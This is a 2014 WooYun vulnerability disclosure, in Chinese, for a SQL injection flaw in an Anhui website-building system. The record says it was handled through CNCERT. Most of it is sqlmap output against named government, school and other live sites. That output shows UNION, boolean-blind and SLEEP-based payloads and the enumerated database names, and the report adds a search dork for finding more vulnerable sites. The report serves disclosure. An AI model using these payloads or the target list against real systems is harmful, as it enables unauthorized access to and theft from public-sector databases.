当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074878

漏洞标题:安徽某建站系统存在SQL注入漏洞影响多个政府、学校网站

相关厂商:安徽省

漏洞作者: 浮萍

提交时间:2014-09-03 14:53

修复时间:2014-12-02 14:54

公开时间:2014-12-02 14:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-03: 细节已通知厂商并且等待厂商处理中
2014-09-08: 厂商已经确认,细节仅向厂商公开
2014-09-11: 细节向第三方安全合作伙伴开放
2014-11-02: 细节向核心白帽子及相关领域专家公开
2014-11-12: 细节向普通白帽子公开
2014-11-22: 细节向实习白帽子公开
2014-12-02: 细节向公众公开

简要描述:

听说通用的确认就有$

详细说明:

安徽省卫生和计划生育委员会
http://www.ahpfpc.gov.cn/
在搜索处输入0

Snap45.jpg


返回正常

Snap46.jpg


输入0'

Snap47.jpg


疑似注入点:http://www.ahpfpc.gov.cn/page.php?fp=sch&key=0

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: key
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: fp=sch&key=0') UNION ALL SELECT NULL,CONCAT(0x71776b6e71,0x6969484c
687078475971,0x716d6f6271),NULL#
---
[13:42:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5


数据库

available databases [10]:
[*] ahrkjj
[*] codefans_gbook
[*] dedecmsv56gbk
[*] dedecmsv57gbksp1
[*] information_schema
[*] jsw
[*] jsw0
[*] mysql
[*] test
[*] zark


搜索关键字 inurl:page.php?fp=

Snap49.jpg


Snap50.jpg


漏洞证明:

安徽省希望工程办公室 www.ahhope.org/page.php?fp=itemdetail&id=14
安徽省人口学会 http://xuehui.ahpfpc.gov.cn/page.php?fp=sch&key=0
安徽新闻出版职业技术学院招生平台 zs.ahcbxy.cn/page.php?fp=list&id=401
安徽新闻出版职业技术学院 www.ahcbxy.cn/page.php?fp=newsdetail&id=55448
宿州市人口计生委 www.ahszjsw.gov.cn/web/page.php?fp=list&id=1
安徽亲子鉴定 http://www.ahqzjd.cn/page.php?fp=sch&key=0
安徽省卫生和计划生育委员会 www.ahpfpc.gov.cn/page.php?fp=sch&key=0
政务公开 szsp.ahcbxy.cn/page.php?fp=newsdetail&id=53896
财务处 cw.ahcbxy.cn/page.php?fp=newsdetail&id=54978
学生管理 xsgl.ahcbxy.cn/page.php?fp=newsdetail&id=1445
...........


列举这么多
安徽省希望工程办公室 www.ahhope.org/page.php?fp=itemdetail&id=14

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fp=itemdetail&id=14 AND 4095=4095
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: fp=itemdetail&id=-6773 UNION ALL SELECT CONCAT(0x71616a6471,0x45454
a41784756597653,0x71627a6771),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: fp=itemdetail&id=14 AND SLEEP(5)
---


web application technology: Apache
back-end DBMS: MySQL 5.0.11


available databases [2]:
[*] ahhope
[*] information_schema


=========
宿州市人口计生委 www.ahszjsw.gov.cn/web/page.php?fp=list&id=1

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fp=list&id=1) AND 5367=5367 AND (2386=2386
Type: UNION query
Title: MySQL UNION query (NULL) - 4 columns
Payload: fp=list&id=1) UNION ALL SELECT CONCAT(0x716e7a7671,0x484c5a79576c49
654b7a,0x716d676d71),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: fp=list&id=1) AND SLEEP(5) AND (7212=7212
---
[13:55:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.2.17
back-end DBMS: MySQL 5.0.11


available databases [2]:
[*] db_web376217
[*] information_schema


================
安徽新闻出版职业技术学院招生平台 zs.ahcbxy.cn/page.php?fp=list&id=401

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fp=list&id=401) AND 2976=2976 AND (2957=2957
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: fp=list&id=401) AND SLEEP(5) AND (7511=7511
---
[13:57:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.2
back-end DBMS: MySQL 5.0.11


available databases [8]:
[*] ahcbxy
[*] ahcbxy0
[*] cb
[*] information_schema
[*] jpkc
[*] mysql
[*] test
[*] txl


==========
安徽省人口学会 http://xuehui.ahpfpc.gov.cn/page.php?fp=sch&key=0

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: key
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: fp=sch&key=0') UNION ALL SELECT CONCAT(0x71786a6171,0x42484b6559457
455477a,0x7166686571),NULL,NULL#
---
[13:59:11] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5


available databases [10]:
[*] ahrkjj
[*] codefans_gbook
[*] dedecmsv56gbk
[*] dedecmsv57gbksp1
[*] information_schema
[*] jsw
[*] jsw0
[*] mysql
[*] test
[*] zark


=================
安徽新闻出版职业技术学院 www.ahcbxy.cn/page.php?fp=newsdetail&id=55448

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.ahcbxy.cn:80/page.php?fp=newsdetail&id=55448 AND 6181=61
81
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: http://www.ahcbxy.cn:80/page.php?fp=newsdetail&id=-8712 UNION ALL S
ELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716c687371,0x62624f41625968497243,0x7166
686971),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.ahcbxy.cn:80/page.php?fp=newsdetail&id=55448 AND SLEEP(5
)
---
[14:01:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.2
back-end DBMS: MySQL 5.0.11


available databases [8]:
[*] ahcbxy
[*] ahcbxy0
[*] cb
[*] information_schema
[*] jpkc
[*] mysql
[*] test
[*] txl


=========
安徽亲子鉴定 http://www.ahqzjd.cn/page.php?fp=sch&key=0

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: key
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: fp=sch&key=0') UNION ALL SELECT NULL,CONCAT(0x71746d6371,0x557a5a68
4265437a634e,0x716a6c6f71),NULL#
---
[14:02:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: MySQL 5


available databases [10]:
[*] ahrkjj
[*] codefans_gbook
[*] dedecmsv56gbk
[*] dedecmsv57gbksp1
[*] information_schema
[*] jsw
[*] jsw0
[*] mysql
[*] test
[*] zark


=========
别的就不测试了

修复方案:

版权声明:转载请注明来源 浮萍@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-08 09:38

厂商回复:

最新状态:

暂无